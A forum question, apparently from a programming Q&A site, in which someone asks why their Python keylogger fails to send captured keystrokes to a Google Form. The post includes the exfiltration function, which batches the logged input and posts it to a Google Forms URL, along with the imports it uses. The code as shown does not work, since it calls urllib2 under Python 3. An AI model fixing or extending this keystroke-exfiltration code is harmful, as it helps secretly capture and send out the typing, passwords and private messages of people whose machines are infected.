# Issues relating to a Google drive keylogger

Tags: python, project, urllib2, google-drive-api, keylogger

I'm going to try to word this as exact as possible.

So I got this Python (using 3.3) keylogger that I am working on and everything is working flawless besides the fact that it doesn't write the logged input into the Form spreadsheet that I have entered.

I can say I've spent over 4 hours trying to figure out what can be the cause of this issue.

My function looks like this:

def GDrive():

```
global data
if len(data)>100:
    url="https://docs.google.com/forms/d/16ia5WLlQRxVVWNJVogVrbggUDkqj7E6Le3eSbwsIPkw/viewform"
    klog={'entry.789302263':data} 

    dataenc=urllib.urlencode(klog)
    req=urllib2.request(url,dataenc)
    response=urllib2.urlopen(req)
    data=''

return True
```

One thing that I think might be the cause of this is the urllib2 module. It was impossible to import. The modules I am using:

import sys, logging
import time, datetime
import urllib, urllib.request
import win32event, win32api, winerror

Really hope someone will be able to assist me in this.